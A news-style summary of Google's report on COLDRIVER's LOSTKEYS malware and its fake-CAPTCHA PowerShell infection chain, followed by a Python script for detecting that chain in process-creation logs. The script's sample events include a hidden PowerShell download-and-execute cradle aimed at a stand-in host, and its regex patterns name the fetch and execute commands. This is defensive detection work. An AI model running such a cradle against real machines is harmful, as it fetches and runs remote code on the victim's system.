Google’s Threat Intelligence Group has uncovered a new malware called LOSTKEYS, developed by the Russian threat actor COLDRIVER. The malware is capable of stealing files, exfiltrating system information, and monitoring processes, representing an escalation in cyber-espionage activities. (Affected: targeted systems and organizations experiencing COLDRIVER’s cyber-espionage campaigns)
Key points:
- LOSTKEYS is a stealthy malware used by the Russian threat actor COLDRIVER to steal files and system information and to monitor running processes.
- The infection chain begins with social engineering via a fake CAPTCHA page prompting users to execute PowerShell commands.
- Once the user completes the fake verification, PowerShell scripts fetch and run further payloads from remote servers, and they hash system characteristics to detect whether they are running in a virtual environment before proceeding.
- The final payload is a Visual Basic Script that specifically targets certain file types and directories for document theft.
- Earlier versions of LOSTKEYS were disguised as Maltego installers, indicating a longer-term low-profile operation dating back to December 2023.
- COLDRIVER has previously targeted high-profile individuals and expanded beyond phishing to include malware deployment.
- Google recommends robust cybersecurity practices such as enrolling in Google’s Advanced Protection Program and implementing strict device security measures.
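The infection chain summarised above (fake CAPTCHA page, user-pasted PowerShell, remote payload fetch, then a dropped Visual Basic Script) leaves a recognisable parent/child process pattern on the endpoint. The following detection logic is an added example written for this summary, not code from Google or from the report; the event field names are assumed (loosely modelled on Sysmon process-creation records) and the events are constructed samples, since the page quotes no actual command lines.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation events (assumed field names: pid, image, parent, cmdline).
# 101 and 102 model the chain described in the summary; 100 and 103 are benign noise.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"pid": "100", "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    {"pid": "101", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -c "iex (iwr http://lure.invalid/verify)"'},
    {"pid": "102", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"wscript.exe C:\Users\u\AppData\Local\Temp\stage.vbs"},
    {"pid": "103", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},
]

# Download-then-execute cradle: a fetch primitive and an eval primitive in either order.
FETCH = r"(?:iwr|invoke-webrequest|downloadstring|net\.webclient|curl)"
EVAL = r"(?:iex|invoke-expression)"
CRADLE = re.compile(rf"{FETCH}\b.*?\b{EVAL}|{EVAL}\b.*?\b{FETCH}", re.I)
# Hidden-window flag, typical of one-liners meant to be pasted into the Run dialog.
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?", re.I)
PS_HOSTS = ("powershell.exe", "pwsh.exe")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles bare names too)."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule, pid) pairs for events matching the fake-CAPTCHA chain."""
    findings: List[Tuple[str, str]] = []
    for ev in events:
        img, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
        # Rule 1: PowerShell spawned straight from the shell (Win+R / Run dialog path),
        # carrying a remote-fetch-and-execute cradle or a hidden-window flag.
        if img in PS_HOSTS and parent == "explorer.exe" and (
                CRADLE.search(cmd) or HIDDEN.search(cmd)):
            findings.append(("clickfix_powershell_cradle", ev["pid"]))
        # Rule 2: a script host launched by PowerShell to run a dropped .vbs file.
        if img in ("wscript.exe", "cscript.exe") and parent in PS_HOSTS \
                and re.search(r"\.vbs\b", cmd, re.I):
            findings.append(("powershell_spawns_vbs", ev["pid"]))
    return findings
```

Tune the parent-process condition to the browsers and shells seen in your own telemetry; a legitimate admin script run from cmd.exe (event 103) is deliberately left unflagged.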